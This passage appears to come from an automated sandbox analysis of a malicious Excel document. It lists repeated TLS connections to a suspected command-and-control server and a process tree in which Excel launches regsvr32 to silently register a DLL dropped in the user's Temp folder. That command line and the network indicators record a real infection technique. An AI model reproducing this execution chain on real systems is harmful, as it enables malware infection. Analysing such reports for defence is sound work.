                                                                  Jan 11, 2021 16:53:31.065752983 CET77.220.64.37443192.168.2.2249303CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:33.173336029 CET77.220.64.37443192.168.2.2249307CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:35.263087034 CET77.220.64.37443192.168.2.2249311CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:37.383410931 CET77.220.64.37443192.168.2.2249315CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:39.461967945 CET77.220.64.37443192.168.2.2249319CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:41.537756920 CET77.220.64.37443192.168.2.2249323CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:43.624650955 CET77.220.64.37443192.168.2.2249327CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:45.731394053 CET77.220.64.37443192.168.2.2249331CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:47.811930895 CET77.220.64.37443192.168.2.2249335CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:49.944209099 CET77.220.64.37443192.168.2.2249339CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:52.017842054 CET77.220.64.37443192.168.2.2249343CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:54.124471903 CET77.220.64.37443192.168.2.2249347CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:56.212049007 CET77.220.64.37443192.168.2.2249351CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:58.309087992 CET77.220.64.37443192.168.2.2249355CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:00.425838947 CET77.220.64.37443192.168.2.2249359CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:02.562263966 CET77.220.64.37443192.168.2.2249363CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:04.685772896 CET77.220.64.37443192.168.2.2249367CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:06.915021896 CET77.220.64.37443192.168.2.2249371CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:09.038177967 CET77.220.64.37443192.168.2.2249375CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:11.129117012 CET77.220.64.37443192.168.2.2249379CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:13.204226017 CET77.220.64.37443192.168.2.2249383CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:15.298644066 CET77.220.64.37443192.168.2.2249387CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:17.447757959 CET77.220.64.37443192.168.2.2249391CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:19.528350115 CET77.220.64.37443192.168.2.2249395CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:21.581721067 CET77.220.64.37443192.168.2.2249399CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:54:23.702207088 CET77.220.64.37443192.168.2.2249403CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:16:51:39
                                                                  Start date:11/01/2021
                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                  Imagebase:0x13fc30000
                                                                  File size:27641504 bytes
                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:16:51:44
                                                                  Start date:11/01/2021
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
                                                                  Imagebase:0xff510000
                                                                  File size:19456 bytes
                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:16:51:45
                                                                  Start date:11/01/2021
                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline: -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
                                                                  Imagebase:0x110000
                                                                  File size:14848 bytes
                                                                  MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:16:52:03
                                                                  Start date:11/01/2021
                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804
                                                                  Imagebase:0x13fef0000
                                                                  File size:995024 bytes
                                                                  MD5 hash:45A078B2967E0797360A2D4434C41DB4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:16:52:03
                                                                  Start date:11/01/2021
                                                                  Path:C:\Windows\System32\DWWIN.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\dwwin.exe -x -s 1804
                                                                  Imagebase:0xffa80000
                                                                  File size:152576 bytes
                                                                  MD5 hash:25247E3C4E7A7A73BAEEA6C0008952B1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >